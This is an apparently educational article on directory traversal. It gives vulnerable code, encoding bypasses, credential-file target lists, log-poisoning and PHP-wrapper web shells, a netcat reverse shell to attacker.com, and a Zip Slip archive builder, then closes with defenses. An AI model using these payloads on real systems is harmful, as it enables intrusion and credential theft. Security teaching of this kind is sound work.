Directory Traversal & Path Traversal: Exploiting File System Access Controls

Directory traversal vulnerabilities, also known as path traversal or dot-dot-slash attacks, enable attackers to access files and directories outside the application's intended scope. By manipulating file path references through user input, attackers bypass access controls to read sensitive configuration files, application source code, system credentials, and in some cases achieve remote code execution. These vulnerabilities persist across web applications, APIs, and desktop software due to inadequate input validation and insecure file handling practices. This article examines the technical mechanisms underlying directory traversal attacks, advanced exploitation techniques, encoding methods to bypass filters, and the various contexts where these vulnerabilities manifest.

Fundamental Concepts and Attack Mechanics

Web applications frequently implement functionality requiring file system access: downloading documents, displaying images, including templates, or reading configuration files. These operations typically restrict access to specific directories through application logic. Directory traversal exploits occur when applications fail to properly validate or sanitize file paths provided through user input.

The core technique involves using relative path sequences, particularly ../ on Unix-like systems and ..\ on Windows, to navigate up the directory tree. Consider a vulnerable file download function:

from flask import Flask, request, send_file

@app.route('/download')
def download():
    filename = request.args.get('file')
    filepath = f'/var/www/uploads/{filename}'
    return send_file(filepath)

A legitimate request like ?file=document.pdf accesses /var/www/uploads/document.pdf. However, an attacker inputs ?file=../../../../etc/passwd, constructing the path /var/www/uploads/../../../../etc/passwd, which resolves to /etc/passwd, exposing system user accounts.

The ../ sequence instructs the file system to move up one directory level. Multiple sequences traverse upward until reaching the root directory, from which attackers access any world-readable file. On Windows systems, both forward slashes and backslashes function as path separators, and drive letter specification enables cross-partition access: C:\Windows\System32\config\SAM.

Common Vulnerable Patterns

Directory traversal vulnerabilities manifest in various application contexts, each with specific exploitation characteristics and impact.

File Download Functionality

Download features represent the most common vulnerability vector. Applications allow users to retrieve uploaded files, documents, or media through URL parameters or POST data:

<?php
$file = $_GET['filename'];
$path = '/var/www/files/' . $file;
if (file_exists($path)) {
    header('Content-Type: application/octet-stream');
    readfile($path);
}
?>

This code directly concatenates user input into the file path without validation. Attackers exploit this to access arbitrary files: ?filename=../../../etc/shadow, ?filename=../../../../windows/win.ini.

Image and Media Display

Applications serving images or media files often construct paths from user-controllable parameters:

app.get('/images/:filename', (req, res) => {
    const filename = req.params.filename;
    const filepath = path.join(__dirname, 'public/images', filename);
    res.sendFile(filepath);
});

While path.join() provides some protection, improper usage or additional manipulation enables traversal. Attackers request /images/../../../etc/passwd, potentially accessing sensitive files if the application doesn't properly validate the resolved path.

Template and Configuration File Inclusion

Server-side template engines and configuration file loaders frequently accept file paths as parameters. If these come from user input, directory traversal becomes possible:

def load_template(template_name):
    template_path = f'templates/{template_name}'
    with open(template_path, 'r') as f:
        return f.read()

# Vulnerable endpoint
@app.route('/render')
def render():
    template = request.args.get('template')
    content = load_template(template)
    return render_template_string(content)

Attackers leverage this to read application source code, database configuration files, or other sensitive resources: ?template=../../../app/config/database.yml.

Log File Viewers

Administrative interfaces displaying log files often implement vulnerable file access patterns:

String logFile = request.getParameter("log");
String logPath = "/var/log/app/" + logFile;
BufferedReader reader = new BufferedReader(new FileReader(logPath));

This allows reading arbitrary system logs or configuration files: ?log=../../../etc/shadow, ?log=../../../../windows/system32/config/sam.

Advanced Exploitation Techniques

Basic ../ sequences often face filtering attempts. Sophisticated attackers employ numerous bypass techniques to evade input validation and access controls.

Absolute Path Injection

If applications check for ../ sequences but don't validate absolute paths, attackers provide complete file paths:

?file=/etc/passwd
?file=C:\Windows\System32\drivers\etc\hosts

This bypasses relative path filtering entirely, directly accessing target files if the application doesn't restrict to intended directories.

Null Byte Injection

Historically, null bytes (%00) terminated strings in C-based languages, truncating file paths and bypassing extension checks. Though largely patched in modern systems, legacy applications remain vulnerable:

?file=../../../../etc/passwd%00.jpg

The application validates the .jpg extension, but the null byte truncates processing at /etc/passwd, ignoring the appended extension. PHP versions before 5.3.4 and many older applications remain exploitable through this technique.

Encoding and Double Encoding

URL encoding obfuscates traversal sequences, bypassing simple string matching filters:

../     becomes    %2e%2e%2f
..\     becomes    %2e%2e%5c

Double encoding further evades detection when applications decode input multiple times:

../     becomes    %252e%252e%252f

The first decoding produces %2e%2e%2f, appearing safe to filters checking decoded input. Subsequent decoding by file system functions reconstructs ../, enabling traversal.

Unicode encoding provides additional obfuscation:

../ becomes %u002e%u002e%u002f

UTF-8 overlong encoding represents characters using more bytes than necessary. The dot character (0x2E) can be encoded as %C0%AE:

../ becomes %C0%AE%C0%AE/

Vulnerable decoders normalize these to standard ASCII, reconstructing traversal sequences that bypass filters checking only standard encoding.

Path Truncation and OS-Specific Behaviors

Windows systems historically truncated filenames at specific lengths. Attackers append extensive character sequences forcing truncation that removes security checks:

?file=../../../../boot.ini...................................

The extended dots exceed Windows path length limits, truncating at the target file while removing appended restrictions.

Windows also supports alternative data streams (ADS) and short filename notation (8.3 format):

?file=../../../../etc/passwd::$DATA
?file=PROGRA~1\   (equivalent to Program Files)

Nested Encoding and Filter Evasion

Filters removing ../ sequences without recursion face nested encoding attacks:

....//    becomes    ../    (after removing ../)
..../     becomes    ../    (after removing ../)

The filter removes the inner ../, inadvertently constructing a valid traversal sequence from remaining characters. Multiple nesting levels defeat multiple filter passes.

Case Manipulation

Case-sensitive filters on case-insensitive file systems enable bypasses:

../ becomes ../   (mixed case: ..\, ../, ..\/)

Windows file systems ignore case, making SYSTEM32 equivalent to system32, but filters checking exact strings miss case variations.

Platform-Specific Exploitation

Different operating systems and platforms present unique characteristics that influence exploitation techniques and target files.

Linux/Unix Target Files

Critical files on Linux systems contain sensitive information useful for further exploitation:

/etc/passwd          - User account information
/etc/shadow          - Password hashes (requires root)
/etc/group           - Group memberships
/proc/self/environ   - Environment variables (may contain credentials)
/proc/self/cmdline   - Process command line arguments
/var/log/apache2/access.log  - Web server logs (potential LFI to RCE)
/home/user/.ssh/id_rsa      - SSH private keys
/var/www/html/config.php    - Application configuration

The /proc pseudo-filesystem provides process and system information without requiring elevated privileges. /proc/self/environ often contains database credentials, API keys, and other sensitive configuration data.

Windows Target Files

Windows systems store critical configuration and credential data in specific locations:

C:\Windows\System32\config\SAM       - User password hashes
C:\Windows\repair\SAM                - Backup SAM file
C:\Windows\System32\drivers\etc\hosts - Host file
C:\inetpub\wwwroot\web.config        - IIS configuration
C:\xampp\htdocs\config.php           - Application config
C:\Windows\Panther\unattend.xml      - Windows installation config (often contains passwords)

Web.config files frequently contain database connection strings with cleartext credentials. Unattend.xml files store administrative passwords used during automated Windows installations.

Cloud and Container Environments

Modern cloud deployments introduce new target files containing credentials and configuration:

/var/run/secrets/kubernetes.io/serviceaccount/token  - Kubernetes service account
/.aws/credentials                                     - AWS credentials
/.azure/credentials                                   - Azure credentials
/root/.docker/config.json                            - Docker registry credentials

Container environments often mount sensitive files or environment variables accessible through path traversal, enabling cloud infrastructure compromise.

Local File Inclusion to Remote Code Execution

Directory traversal enabling arbitrary file read (Local File Inclusion - LFI) can escalate to Remote Code Execution (RCE) through several techniques.

Log Poisoning

Web server access logs record user-controlled data including User-Agent headers and request URIs. Attackers inject PHP code into logs, then include the log file for execution:

# Inject payload into logs via User-Agent
curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/

# Include log file and execute commands
http://target.com/view.php?file=../../../../var/log/apache2/access.log&cmd=whoami

The PHP interpreter executes the injected code within the included log file, providing remote command execution. This technique works with any file accepting attacker-controlled content: error logs, mail logs, or session files.

PHP Wrapper Exploitation

PHP provides stream wrappers enabling protocol-specific file access. The php://filter wrapper reads file contents with encoding transformations:

?file=php://filter/convert.base64-encode/resource=../../../../etc/passwd

This returns base64-encoded file contents, bypassing restrictions on displaying raw file data. The php://input wrapper reads POST data as a file, enabling code injection:

# POST request with PHP payload
POST /view.php?file=php://input HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

<?php system($_GET['cmd']); ?>

The data:// wrapper embeds data directly in the URL:

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+

This base64-encoded payload decodes to <?php system($_GET['cmd']); ?>, executing when included.

Session File Inclusion

PHP stores session data in predictable file locations, typically /var/lib/php/sessions/sess_[SESSIONID]. Attackers inject PHP code into session variables:

$_SESSION['username'] = '<?php system($_GET["cmd"]); ?>';

Then include the session file for execution:

?file=../../../../var/lib/php/sessions/sess_abc123&cmd=whoami

The PHP interpreter executes code stored in the session file, achieving RCE.

/proc/self/environ Exploitation

The /proc/self/environ file contains environment variables for the current process. Attackers inject code through User-Agent headers captured in environment variables:

curl -A "<?php system('nc attacker.com 4444 -e /bin/bash'); ?>" http://target.com/

Then include the environ file:

?file=../../../../proc/self/environ

PHP executes the injected payload, establishing a reverse shell.

Zip Slip Vulnerability

Archive extraction represents a specialized path traversal variant. Maliciously crafted ZIP files contain entries with path traversal sequences in filenames. Vulnerable extraction code writes files outside intended directories:

import zipfile

with zipfile.ZipFile('malicious.zip', 'r') as zip_ref:
    zip_ref.extractall('/var/www/uploads/')

The archive contains a file named ../../../../var/www/html/shell.php. Upon extraction, this file is written to the web root directory, enabling remote code execution.

Creating a malicious ZIP archive:

import zipfile
import io

zip_buffer = io.BytesIO()
with zipfile.ZipFile(zip_buffer, 'w') as zip_file:
    info = zipfile.ZipInfo('../../../../var/www/html/shell.php')
    zip_file.writestr(info, '<?php system($_GET["cmd"]); ?>')

This vulnerability affects numerous programming languages and libraries that fail to validate extracted file paths. Similar issues exist in TAR, RAR, and other archive formats.

API and Application-Specific Contexts

Modern applications present additional contexts where directory traversal manifests beyond traditional web applications.

REST API File Access

RESTful APIs providing file access through path parameters face traversal vulnerabilities:

GET /api/v1/files/../../../../etc/passwd
GET /api/documents/{id}/../../../config/database.yml

JSON-based APIs may accept file paths in request bodies:

{
  "document": "../../../../etc/passwd",
  "operation": "download"
}

GraphQL File Queries

GraphQL endpoints accepting file path arguments enable traversal:

query {
  getFile(path: "../../../../etc/passwd") {
    content
  }
}

GraphQL's flexible query structure complicates input validation, particularly when paths are constructed dynamically from multiple parameters.

XML External Entity with Path Traversal

XXE vulnerabilities combined with path traversal enable arbitrary file reading:

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>

This reads and returns file contents within XML responses.

Defense Mechanisms and Mitigation

Preventing directory traversal requires comprehensive input validation and secure file handling practices.

Input Validation and Allowlisting

Implement strict allowlists of permitted files or patterns:

ALLOWED_FILES = ['document.pdf', 'report.xlsx', 'image.png']

filename = request.args.get('file')
if filename not in ALLOWED_FILES:
    abort(403)

Reject any input containing path traversal sequences: ../, ..\, absolute paths, or null bytes.

Path Canonicalization

Resolve paths to canonical form before validation:

import os.path

base_dir = '/var/www/uploads/'
filename = request.args.get('file')
filepath = os.path.join(base_dir, filename)
canonical_path = os.path.realpath(filepath)

if not canonical_path.startswith(os.path.realpath(base_dir)):
    abort(403)

This approach resolves symbolic links and relative path sequences, ensuring the final path remains within intended boundaries.

Framework Security Features

Utilize framework-provided secure file handling:

# Flask secure filename
from werkzeug.utils import secure_filename
filename = secure_filename(user_input)

# Django FilePathField with path restriction
from django.forms import FilePathField
field = FilePathField(path="/safe/directory/", recursive=False)

These functions strip dangerous characters and enforce directory restrictions.

Principle of Least Privilege

Run applications with minimal file system permissions. Use chroot jails or containers to isolate applications from the broader file system. Even if traversal occurs, limited permissions restrict accessible files.

Conclusion

Directory traversal vulnerabilities persist due to the fundamental challenge of safely handling user-controlled file paths. These vulnerabilities enable information disclosure, credential theft, and when combined with other techniques, remote code execution. Understanding advanced exploitation methods—from encoding bypasses to log poisoning—enables security professionals to identify and remediate these critical flaws. Effective defense requires rigorous input validation, path canonicalization, framework security features, and defense-in-depth approaches. As applications increasingly interact with file systems through APIs, cloud storage, and microservices architectures, vigilant attention to path handling security remains essential to preventing unauthorized file access and system compromise.